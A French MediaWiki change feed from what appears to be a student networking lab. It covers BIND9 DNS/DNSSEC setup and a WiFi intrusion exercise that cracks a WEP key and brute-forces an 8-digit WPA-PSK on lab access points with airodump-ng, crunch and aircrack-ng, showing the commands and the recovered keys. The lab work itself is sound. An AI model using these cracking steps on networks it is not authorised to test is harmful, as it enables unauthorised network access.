Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:DNS_Viz.png&amp;diff=12247</id>
		<title>Fichier:DNS Viz.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:DNS_Viz.png&amp;diff=12247"/>
		<updated>2026-02-10T23:34:50Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Il n'y a pas d'erreurs, nous voyons que le DNSSEC fonctionne !&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:D%C3%A9ploiement_DNS_IPv6.png&amp;diff=12246</id>
		<title>Fichier:Déploiement DNS IPv6.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:D%C3%A9ploiement_DNS_IPv6.png&amp;diff=12246"/>
		<updated>2026-02-10T23:29:17Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Le DNS a bien été déployé partout dans le monde !&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:D%C3%A9ploiement_IPv4.png&amp;diff=12245</id>
		<title>Fichier:Déploiement IPv4.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:D%C3%A9ploiement_IPv4.png&amp;diff=12245"/>
		<updated>2026-02-10T23:26:21Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Nous voyons que le DNS a bien été déployé partout dans le monde&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12244</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12244"/>
		<updated>2026-02-10T23:23:16Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
Dans le cas de tompere2.xyz, on voit que c'est bon, aussi bien en IPv4 qu'en IPv6&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
